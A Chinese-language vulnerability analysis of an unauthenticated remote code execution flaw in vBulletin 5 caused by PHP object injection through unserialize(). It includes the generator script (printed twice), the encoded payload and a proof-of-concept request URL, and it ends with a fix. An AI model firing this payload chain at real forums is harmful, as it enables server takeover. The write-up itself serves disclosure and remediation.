vBulletin 5 远程命令执行（无需登录）

官方公告：http://www.vbulletin.org/forum/showthread.php?p=2558144

POC 原文地址：http://pastie.org/pastes/10527766/text?key=wq1hgkcj4afb9ipqzllsq

有个叫 Coldzer0 的家伙在 http://0day.today 上卖 vBulletin 的 RCE exp，vBulletin 的主论坛已经被攻破，据称该漏洞已经存在3年以上。下面是漏洞分析：

vBulletin 在 `/core/vb/api` 提供了一些 ajax 的 API 调用，其中有个 `hook.php` 用到了反序列化：

public function decodeArguments($arguments)  {    if ($args = @unserialize($arguments))    {      $result = '';       foreach ($args AS $varname => $value)      {        $result .= $varname; 

值得注意的是在[之前的 vBulletin 漏洞](http://drops.wooyun.org/papers/8261)中也出现过反序列化造成的问题。

看起来这次 unserialize() 不会有什么漏洞了，但是在 `/core/vb/db/result.php` 里发现了可疑的地方：

class vB_dB_Result implements Iterator  {  ...    public function rewind()    {      //no need to rerun the query if we are at the beginning of the recordset.      if ($this->bof)      {        return;      }       if ($this->recordset)      {        $this->db->free_result($this->recordset);      } 

每次用 foreach() 访问一个迭代器对象时，rewind() 这个函数都会被首先调用。我们再看看 `/core/vb/database.php` 中的 free_result() 函数：

abstract class vB_Database  {  ...      function free_result($queryresult)    {      $this->sql = '';      return @$this->functions['free_result']($queryresult);    }  

因此这里产生了一个对象注入，原理可以看看 OWASP 里的 [PHP Object Injection](https://www.owasp.org/index.php/PHP_Object_Injection)。

我们可以构造一个序列化对象测试下：

$ php << 'eof'  <?php  class vB_Database {         public $functions = array();          public function __construct()         {                 $this->functions['free_result'] = 'phpinfo';         }  }   class vB_dB_Result {         protected $db;         protected $recordset;          public function __construct()         {                 $this->db = new vB_Database();                 $this->recordset = 1;         }  }   print urlencode(serialize(new vB_dB_Result())) . "/n";  eof 

$ php << 'eof'  <?php  class vB_Database {         public $functions = array();          public function __construct()         {                 $this->functions['free_result'] = 'phpinfo';         }  }   class vB_dB_Result {         protected $db;         protected $recordset;          public function __construct()         {                 $this->db = new vB_Database();                 $this->recordset = 1;         }  }   print urlencode(serialize(new vB_dB_Result())) . "/n";  eof 

得到 URL 编码后的字符串：

O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bi%3A1%3B%7D

解一下码便于分析：

O:12:"vB_dB_Result":2:{s:5:"*db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:7:"phpinfo";}}s:12:"*recordset";i:1;}

PHP 序列化的格式可以参看这篇文章：[PHP 序列化（serialize）格式详解](http://www.neatstudio.com/show-161-1.shtml)。

所以最终的 POC 就是：

http://localhost/vbforum/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D 

修复方案在上文提到的 OWASP 的资料中已经说明：

>Do not use unserialize() function with user-supplied input, use JSON functions instead.

把 unserialize() 换成 json_decode() 就行。